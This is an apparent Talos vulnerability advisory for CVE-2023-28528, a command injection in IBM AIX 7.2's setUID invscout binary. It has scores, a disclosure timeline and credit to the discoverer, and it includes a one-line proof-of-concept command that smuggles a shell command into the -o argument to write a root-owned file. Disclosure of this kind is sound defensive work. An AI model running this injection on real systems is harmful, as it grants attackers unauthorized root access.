8.4 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.002 Low
EPSS
Percentile
56.9%
CVE-2023-28528
An OS command injection vulnerability exists in the invscout setUID binary functionality of IBM Corporation AIX 7.2. A specially-crafted command line argument can lead to execute privileged operation. An attacker can use arbitrary code execution to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
IBM Corporation AIX 7.2
AIX - <http://us.ibm.com>
5.5 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
CWE-78 - Improper Neutralization of Special Elements used in an OS Command (βOS Command Injectionβ)
AIX is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms.
The invscout
setUID binary has an undocumented parameter that can be used to request the installation of an arbitrary RPM. Furthermore, the mechanism by which the RPM is installed requires the supplied value to be concatenated into a string that is then passed into system()
.
The most trivial method of exploitatation to gain command execution takes the following form:
$ invscout -RPM ../../../../../$HOME/info-6.7-1.aix5.1.ppc.rpm -o "-i ../../../../../$HOME/info-6.7-1.aix5.1.ppc.rpm; touch /etc/pwned; echo " package info-6.7-1.ppc is already installed /var/adm/invscout/microcode/../../../../..//home/tmb/info-6.7-1.aix5.1.ppc.rpm $ ls -la /etc/pwned -rw-rw-rw- 1 root staff 0 Dec 18 12:59 /etc/pwned
Note: The umask
is set to 0 prior to exploitation commencing.
2023-01-09 - Initial Vendor Contact
2023-01-16 - Vendor Disclosure
2023-04-12 - Vendor Patch Release
2023-04-24 - Public Release
Discovered by Tim Brown of Cisco Security Advisory EMEAR.
Vulnerability Reports Next Report
TALOS-2023-1693
Previous Report
TALOS-2023-1690